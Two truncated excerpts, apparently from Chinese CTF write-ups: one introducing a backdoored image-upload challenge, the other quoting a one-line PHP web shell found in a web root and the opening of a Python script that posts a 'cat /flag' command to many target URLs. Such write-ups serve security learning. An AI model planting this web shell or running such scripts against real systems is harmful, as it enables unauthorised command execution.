随便做了做，分低的没打 PHhhar! 题目介绍：小聪明的程序员接过老板的命令，开发一个图片上传的网站，他为了方便给自己留了一个后门，想着反正是黑盒，没人能知道，老板在家背后凉飕飕的，觉得这个程序员不靠谱，现要求你去测试一下这个正在开发的网站flag在/readddf1ag_getfl4g 思路 进去后是一个上传图片的网页，经测试和扫描后发现存在一…

最简短的一集，小时候看这集吓哭了 总共三道题，第一道题在网站根目录下有..php文件，内容如下 <?=@$_POST[9]=> 于是写个批量脚本，顺带一提其他靶机还不用扫ip，官方给 import requests url_list = ... data = { "9": "echo `cat /flag`" } for url in…